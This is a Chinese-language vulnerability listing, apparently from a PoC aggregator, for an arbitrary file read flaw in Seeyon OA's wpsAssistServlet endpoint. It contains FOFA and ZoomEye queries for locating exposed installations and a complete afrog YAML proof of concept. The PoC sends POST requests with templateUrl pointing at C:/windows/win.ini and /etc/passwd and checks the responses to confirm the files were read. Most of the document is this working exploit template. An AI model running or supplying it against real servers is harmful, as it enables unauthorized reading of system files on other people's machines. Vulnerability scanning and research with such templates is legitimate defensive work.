seeyon-wpsassist-servlet-fileread: 致远OA存在任意文件读取漏洞

日期: 2025-09-01 | 影响软件: seeyonwpsassistservletfileread | POC: 已公开

漏洞描述

FOFA: app="致远互联-OA" && title="V8.0SP2" ZoomEye: app:"用友 致远OA"

PoC代码[已公开]

id: seeyon-wpsassist-servlet-fileread

info:
  name: 致远OA存在任意文件读取漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    FOFA: app="致远互联-OA" && title="V8.0SP2"
    ZoomEye: app:"用友 致远OA"
  tags: seeyon,fileread
  created: 2023/10/31

rules:
  r0:
    request:
      method: POST
      path: /seeyon/wpsAssistServlet
      body: flag=template&templateUrl=C:/windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
  r1:
    request:
      method: POST
      path: /seeyon/wpsAssistServlet
      body: flag=template&templateUrl=/etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() || r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/seeyon-wpsassist-servlet-fileread.yaml